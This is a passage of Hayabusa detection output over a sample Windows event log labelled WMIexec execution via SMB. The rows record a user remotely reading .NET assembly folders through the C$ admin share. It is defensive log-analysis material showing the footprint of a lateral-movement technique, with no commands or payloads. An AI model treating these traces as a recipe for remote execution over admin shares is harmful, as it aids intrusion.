+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 